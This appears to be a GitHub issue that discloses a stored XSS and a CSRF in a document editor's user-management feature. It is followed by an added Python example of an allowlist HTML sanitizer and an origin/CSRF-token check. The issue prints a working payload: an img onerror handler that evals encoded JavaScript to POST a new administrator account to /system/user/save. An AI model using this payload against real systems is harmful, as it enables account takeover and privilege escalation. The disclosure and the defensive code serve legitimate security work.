
Vulnerability: Stored XSS and CSRF #68

Open
@0x2E

Description

@0x2E

Hello, I found two vulnerabilities: a stored XSS and a CSRF.
An attacker can exploit these vulnerabilities to execute malicious JavaScript on a document page and hijack the identity of other users (normal users or administrators).

XSS

The document editor does not filter or block the execution of JavaScript, resulting in stored XSS. Any user browsing a document containing the malicious XSS code will trigger the vulnerability.

[image: xss]

CSRF

Using the XSS vulnerability from the previous step, an attacker can hijack the identity of other users. I recorded a GIF to demonstrate a normal user hijacking the super administrator's identity to create a new administrator account.

Payload

<img src=# onerror='eval(decodeURI("var%20a%20=%20window.XMLHttpRequest%20?%20new%20XMLHttpRequest()%20:%20new%20ActiveXObject(%22Microsoft.XMLHTTP%22);a.open(%22POST%22,%22/system/user/save%22,false);a.setRequestHeader(%22Content-type%22,%22application/x-www-form-urlencoded%22);a.send(%22username=hack&given_name=hack&password=hack&email=1%25401.cn&mobile=18888888888&role_id=1&phone=&department=&position=&location=&im=%22);"))'>
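As an added defensive example (not part of this issue or of the project's own code), the following Python shows the two server-side controls that address what the report describes: an allowlist sanitizer applied to editor-submitted HTML, which drops `<script>` content, every `on*` event handler and `javascript:` URLs, and a same-origin plus per-session token check in front of a state-changing endpoint modelled on `/system/user/save`. The tag/attribute policy, the `csrf_token` form field, the session id, the secret and the origin values are all constructed for the example.

```python
import hashlib
import hmac
from html import escape
from html.parser import HTMLParser
from typing import Dict, List, Optional, Tuple

# --- 1. Allowlist sanitizer for editor-submitted HTML (constructed policy) ---

ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "h1", "h2", "h3",
                "ul", "ol", "li", "pre", "code", "a", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed"}
SAFE_URL_PREFIXES = ("http://", "https://", "/", "#")   # no javascript:, data:, vbscript:
VOID_TAGS = {"br", "img"}


class Sanitizer(HTMLParser):
    """Rebuilds HTML keeping only allowlisted tags and attributes.

    Event handlers (onerror, onload, ...) are never on the allowlist, so an
    <img onerror=...> element is reduced to a plain <img>.
    """

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: List[str] = []
        self.skip_depth = 0  # > 0 while inside a dropped element; its content is discarded

    def handle_starttag(self, tag: str, attrs: List[Tuple[str, Optional[str]]]) -> None:
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag: drop the tag itself, keep its text
        kept = []
        for name, value in attrs:  # HTMLParser already lowercases attribute names
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops on*, style, srcdoc and anything else not listed
            value = (value or "").strip()
            if name in ("href", "src") and not value.lower().startswith(SAFE_URL_PREFIXES):
                continue  # drops javascript: and data: URLs
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag: str) -> None:
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data: str) -> None:
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))


def sanitize(html_in: str) -> str:
    """Return document HTML with scripts, event handlers and unsafe URLs removed."""
    p = Sanitizer()
    p.feed(html_in)
    p.close()
    return "".join(p.out)


# --- 2. Same-origin + token check for a state-changing endpoint (constructed) ---

def issue_csrf_token(session_id: str, secret: bytes) -> str:
    """Per-session token bound to a server secret; embedded in every form."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def handle_user_save(session_id: str, secret: bytes, headers: Dict[str, str],
                     form: Dict[str, str], site_origin: str) -> str:
    """Simulated user-creation handler: create only when origin and token check out."""
    origin = headers.get("Origin")
    referer = headers.get("Referer", "")
    same_site = origin == site_origin or (origin is None and referer.startswith(site_origin + "/"))
    if not same_site:
        return "rejected: cross-site origin"
    expected = issue_csrf_token(session_id, secret)
    if not hmac.compare_digest(expected, form.get("csrf_token", "")):
        return "rejected: missing or invalid CSRF token"
    return f"created user {form.get('username')} with role_id={form.get('role_id')}"


if __name__ == "__main__":
    # Constructed inputs modelled on the report's vector.
    print(sanitize('<p>hi<script>evil()</script> there</p>'))      # <p>hi there</p>
    print(sanitize('<img src=# onerror="alert(1)">'))               # <img src="#">
    secret = b"constructed-server-secret"
    print(handle_user_save("sess-1", secret, {"Origin": "https://docs.example.test"},
                           {"username": "hack", "role_id": "1"}, "https://docs.example.test"))
```

Note the division of labour: the origin and token checks stop a classic cross-site forgery, but they do not stop a request issued by script already running inside the victim's origin, which is the case in this report, because such script can read the token from the page it was injected into. The stored XSS is the root cause, so sanitizing editor output (or a Content Security Policy that disallows inline handlers) is the change that closes both findings.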
